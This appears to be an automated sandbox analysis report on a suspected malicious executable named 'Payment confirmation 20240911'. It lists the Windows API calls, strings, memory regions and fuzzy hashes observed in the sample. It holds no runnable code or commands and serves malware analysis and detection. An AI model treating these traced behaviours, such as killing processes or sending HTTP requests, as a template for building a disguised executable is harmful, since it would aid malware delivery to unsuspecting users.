                                          • GetMenu.USER32(?,00000001,00000000), ref: 0134833D
                                          • GetMenuItemCount.USER32(00000000), ref: 01348374
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0134839C
                                          • GetMenuItemID.USER32(?,?), ref: 0134840B
                                          • GetSubMenu.USER32(?,?), ref: 01348419
                                          • PostMessageW.USER32 ref: 0134846A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          APIs
                                          • _memset.LIBCMT ref: 0132552E
                                          • GetMenuItemInfoW.USER32 ref: 01325579
                                          • IsMenu.USER32(00000000), ref: 01325599
                                          • CreatePopupMenu.USER32 ref: 013255CD
                                          • GetMenuItemCount.USER32(000000FF), ref: 0132562B
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0132565C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • BeginPaint.USER32(?,?), ref: 012FB1C1
                                          • GetWindowRect.USER32(?,?), ref: 012FB225
                                          • ScreenToClient.USER32(?,?), ref: 012FB242
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012FB253
                                          • EndPaint.USER32(?,?), ref: 012FB29D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          APIs
                                          • ShowWindow.USER32(013A1810,00000000), ref: 0134E21B
                                          • EnableWindow.USER32(00000000,00000000), ref: 0134E23F
                                          • ShowWindow.USER32(013A1810,00000000), ref: 0134E29F
                                          • ShowWindow.USER32(00000000,00000004), ref: 0134E2B1
                                          • EnableWindow.USER32(00000000,00000001), ref: 0134E2D5
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0134E2F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          APIs
                                            • Part of subcall function 012FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                            • Part of subcall function 012FB58B: BeginPath.GDI32(?), ref: 012FB611
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0134E9F2
                                          • LineTo.GDI32(00000000,00000003,?), ref: 0134EA06
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0134EA14
                                          • LineTo.GDI32(00000000,00000000,?), ref: 0134EA24
                                          • EndPath.GDI32(00000000), ref: 0134EA34
                                          • StrokePath.GDI32(00000000), ref: 0134EA44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0131EFB6
                                          • GetDeviceCaps.GDI32(00000000,00000058,?,?), ref: 0131EFC7
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?), ref: 0131EFCE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0131EFD6
                                          • MulDiv.KERNEL32 ref: 0131EFED
                                          • MulDiv.KERNEL32 ref: 0131EFFF
                                            • Part of subcall function 0131A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0131A79D,00000000,00000000,?,0131AB73), ref: 0131B2CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                          • String ID:
                                          • API String ID: 603618608-0
                                          APIs
                                          • __init_pointers.LIBCMT ref: 013087D7
                                            • Part of subcall function 01301E5A: __initp_misc_winsig.LIBCMT ref: 01301E7E
                                            • Part of subcall function 01301E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01308BE1
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01308BF5
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01308C08
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01308C1B
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01308C2E
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01308C41
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01308C54
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01308C67
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01308C7A
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01308C8D
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01308CA0
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01308CB3
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01308CC6
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01308CD9
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01308CEC
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 01308CFF
                                          • __mtinitlocks.LIBCMT ref: 013087DC
                                            • Part of subcall function 01308AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0139AC68,00000FA0,?,?,013087E1,01306AFA,013967D8,00000014), ref: 01308AD1
                                          • __mtterm.LIBCMT ref: 013087E5
                                            • Part of subcall function 0130884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013087EA,01306AFA,013967D8,00000014), ref: 013089CF
                                            • Part of subcall function 0130884D: _free.LIBCMT ref: 013089D6
                                            • Part of subcall function 0130884D: DeleteCriticalSection.KERNEL32(0139AC68,?,?,013087EA,01306AFA,013967D8,00000014), ref: 013089F8
                                          • __calloc_crt.LIBCMT ref: 0130880A
                                          • GetCurrentThreadId.KERNEL32(01306AFA,013967D8,00000014), ref: 01308833
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 2942034483-0
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 1423608774-0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 012E1898
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 012E18A0
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 012E18AB
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 012E18B6
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 012E18BE
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 012E18C6
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          APIs
                                          • PostMessageW.USER32 ref: 01328504
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0132851A
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 01328529
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01328538
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01328542
                                          • CloseHandle.KERNEL32(00000000), ref: 01328549
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A330
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A341
                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A34E
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A35B
                                            • Part of subcall function 01329CCE: CloseHandle.KERNEL32(?), ref: 01329CD8
                                          • InterlockedExchange.KERNEL32(?,000001F6,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A36E
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A375
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 012EBBD9: _memmove.LIBCMT ref: 012EBC33
                                          • __swprintf.LIBCMT ref: 012FD98F
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 012FD832
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0133B4A8
                                          • CharUpperBuffW.USER32(?,?), ref: 0133B5B7
                                          • VariantClear.OLEAUT32(?), ref: 0133B73A
                                            • Part of subcall function 0132A6F6: VariantInit.OLEAUT32(00000000), ref: 0132A736
                                            • Part of subcall function 0132A6F6: VariantCopy.OLEAUT32(?,?), ref: 0132A73F
                                            • Part of subcall function 0132A6F6: VariantClear.OLEAUT32(?), ref: 0132A74B
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          APIs
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • _memset.LIBCMT ref: 01325E56
                                          • GetMenuItemInfoW.USER32 ref: 01325E85
                                          • SetMenuItemInfoW.USER32 ref: 01325F31
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01325F5B
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          APIs
                                          • GetWindowRect.USER32(007542E0,?), ref: 0134C354
                                          • ScreenToClient.USER32(?,00000002), ref: 0134C384
                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001), ref: 0134C3EA
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID: `"u
                                          • API String ID: 3880355969-810275233
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 013210B8
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 013210EE
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 013210FF
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01321181
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          APIs
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B3E1
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID: `"u
                                          • API String ID: 634782764-810275233
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0134D617
                                          • GetWindowRect.USER32(?,?), ref: 0134D68D
                                          • PtInRect.USER32(?,?,0134EB2C), ref: 0134D69D
                                          • MessageBeep.USER32(00000000,?,?,?,?,0134EB2C,?,?,?), ref: 0134D70E
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID: `"u
                                          • API String ID: 1352109105-810275233
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 01340478
                                            • Part of subcall function 012E7F40: _memmove.LIBCMT ref: 012E7F8F
                                            • Part of subcall function 012EA2FB: _memmove.LIBCMT ref: 012EA33D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$BuffCharLower
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 2411302734-567219261
                                          • Opcode ID: 68b2f4b95edb486852df68cf19b1e8f45dd3e16493ccbefc7ecf7be3dbcbea22
                                          • Instruction ID: b6779e8bfe126228ee93c953ee125f7c248e533c5060f6135db6c0c4e3b44bfe
                                          • Opcode Fuzzy Hash: 68b2f4b95edb486852df68cf19b1e8f45dd3e16493ccbefc7ecf7be3dbcbea22
                                          • Instruction Fuzzy Hash: B831AE7561421AEBCF04EF98C9409FEB3F4FF15218F008A29E562AB690DB31E905CB80
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0131C684
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0131C697
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0131C6C7
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 458670788-1403004172
                                          • Opcode ID: 47a28080b2be4b1acd354919cfc2ee4f94d1d7a3935a1913cd130ae62cdc49ed
                                          • Instruction ID: 20d7e263362655479fb5d492fc1aadee9cdcbd9a3633f5a4b35bfb4711292379
                                          • Opcode Fuzzy Hash: 47a28080b2be4b1acd354919cfc2ee4f94d1d7a3935a1913cd130ae62cdc49ed
                                          • Instruction Fuzzy Hash: 10212671940104BEDB189BA8C894DFF7BA8DF11368F585919E422E31E4DB745D0A8710
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0134A74F
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0134A75D
                                          • DestroyWindow.USER32 ref: 0134A764
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: `"u$msctls_updown32
                                          • API String ID: 4014797782-3838846204
                                          • Opcode ID: 81d2e0c07b2091dae471cb25f4f9f37ef18a2083aafb0a0069b0f7dcea805fbf
                                          • Instruction ID: c762822c236f86ca703b34309dd1a93bdf25b7ccd53afd2ac360bec15c1aea2b
                                          • Opcode Fuzzy Hash: 81d2e0c07b2091dae471cb25f4f9f37ef18a2083aafb0a0069b0f7dcea805fbf
                                          • Instruction Fuzzy Hash: 95213375600205AFDB21DF68DCC0EA73BEDEB5A7A8F440559FA0697251C770EC11CB60
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01334A60
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334A86
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01334AB6
                                          • InternetCloseHandle.WININET(00000000), ref: 01334AFD
                                            • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 1951874230-3916222277
                                          • Opcode ID: d1749156c49fae14292ded339a1ede29d319a730307905a5a95d059ea526b253
                                          • Instruction ID: 8bd6a69ed20ca6ff5987cce44e957ba0b1f3af150b8a9800e23dc8d92bf14b41
                                          • Opcode Fuzzy Hash: d1749156c49fae14292ded339a1ede29d319a730307905a5a95d059ea526b253
                                          • Instruction Fuzzy Hash: 642192B6640209BFE711DFA89C84EBBBAFCEB88648F00411AF54596150DB649D064779
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • GetCursorPos.USER32(?), ref: 0134EFE2
                                          • TrackPopupMenuEx.USER32 ref: 0134EFF7
                                          • GetCursorPos.USER32(?), ref: 0134F041
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0135F3C3,?,?,?), ref: 0134F077
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID: `"u
                                          • API String ID: 2864067406-810275233
                                          • Opcode ID: 4c7df89d2220be6a963fca0df77c04908faa8c69c7d443bd4d082ced90dde004
                                          • Instruction ID: 4ed4e0b112cc2261631ab5ef4813ebd209e24452fb42d066125e86118f194ad8
                                          • Opcode Fuzzy Hash: 4c7df89d2220be6a963fca0df77c04908faa8c69c7d443bd4d082ced90dde004
                                          • Instruction Fuzzy Hash: D521B135600018EFEB258F9DC898EEA7FFDFB89758F484069FA05472A1C331A951DB90
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01348F69
                                          • LoadLibraryW.KERNEL32(?), ref: 01348F70
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01348F85
                                          • DestroyWindow.USER32 ref: 01348F8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: a24bc3ff10db0cc2c5ae8a3615351449d39563e31ee73ffd40299eceaf3b7abb
                                          • Instruction ID: dae5ca9d57b66eb40511cdeb7270bc0effbf9c95e76aa9e4106d900dc37907e7
                                          • Opcode Fuzzy Hash: a24bc3ff10db0cc2c5ae8a3615351449d39563e31ee73ffd40299eceaf3b7abb
                                          • Instruction Fuzzy Hash: 5B21CD71200209AFEF214EA8EC40EBB7BEEEB49328F104668FB5493191D331EC559B60
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132E392
                                          • GetVolumeInformationW.KERNEL32 ref: 0132E3E6
                                          • __swprintf.LIBCMT ref: 0132E3FF
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0137DBF0), ref: 0132E43D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
